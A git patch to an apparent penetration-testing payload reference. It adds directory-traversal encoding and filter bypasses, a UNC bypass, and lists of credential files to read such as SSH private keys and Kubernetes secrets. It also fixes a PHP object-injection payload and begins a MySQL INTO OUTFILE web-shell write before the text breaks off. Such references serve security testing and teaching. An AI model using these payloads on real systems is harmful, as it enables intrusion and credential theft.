From f6564869f07897f469027a341bb7221f687ec6ab Mon Sep 17 00:00:00 2001 From: Swissky Date: Fri, 5 Jul 2019 18:42:42 +0200 Subject: [PATCH] Fix typo in PHP Object injection --- Directory Traversal/README.md | 43 +++++++++++++++++++++----------- Insecure Deserialization/PHP.md | 2 +- SQL Injection/MySQL Injection.md | 6 +++++ 3 files changed, 36 insertions(+), 15 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 2be8520..0a0941c 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -6,7 +6,14 @@ * [Tools](#tools) * [Basic exploitation](#basic-exploitation) + * [16 bits Unicode encoding](#) + * [UTF-8 Unicode encoding](#) + * [Bypass "../" replaced by ""](#) + * [Double URL encoding](#) + * [UNC Bypass](#unc-bypass) * [Path Traversal](#path-traversal) + * [Interesting Linux files](#) + * [Interesting Windows files](#) ## Tools @@ -31,7 +38,7 @@ We can use the `..` characters to access the parent directory, the following str %uff0e%uff0e%u2216 ``` -16 bit Unicode encoding +### 16 bits Unicode encoding ```powershell . = %u002e @@ -39,7 +46,7 @@ We can use the `..` characters to access the parent directory, the following str \ = %u2216 ``` -UTF-8 Unicode encoding +### UTF-8 Unicode encoding ```powershell . = %c0%2e, %e0%40%ae, %c0ae @@ -47,6 +54,7 @@ UTF-8 Unicode encoding \ = %c0%5c, %c0%80%5c ``` +### Bypass "../" replaced by "" Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them. ```powershell @@ -54,7 +62,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings ...\.\ ``` -Double URL encoding +### Double URL encoding ```powershell . = %252e @@ -62,10 +70,18 @@ Double URL encoding \ = %255c ``` +### UNC Bypass + +An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. + +```powershell +\\localhost\c$\windows\win.ini +``` + ## Path Traversal -Linux - Interesting files to check out : +### Interesting Linux files ```powershell /etc/issue @@ -85,9 +101,16 @@ Linux - Interesting files to check out : /proc/net/route /proc/net/tcp /proc/net/udp +/proc/self/cwd/index.php +/proc/self/cwd/main.py +/home/$USER/.bash_history +/home/$USER/.ssh/id_rsa +/var/run/secrets/kubernetes.io/serviceaccount ``` -Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) +### Interesting Windows files + +Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) ```powershell c:/boot.ini @@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa /var/log/mail ``` -Other easy win files. - -```powershell -/proc/self/cwd/index.php -/home/$USER/.bash_history -/var/run/secrets/kubernetes.io/serviceaccount -``` - - ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) +* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index da38348..a082110 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -99,7 +99,7 @@ if($obj) { Payload: ```php -O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;} +O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} ``` ## Others exploits diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 5a63dd5..22c3b53 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '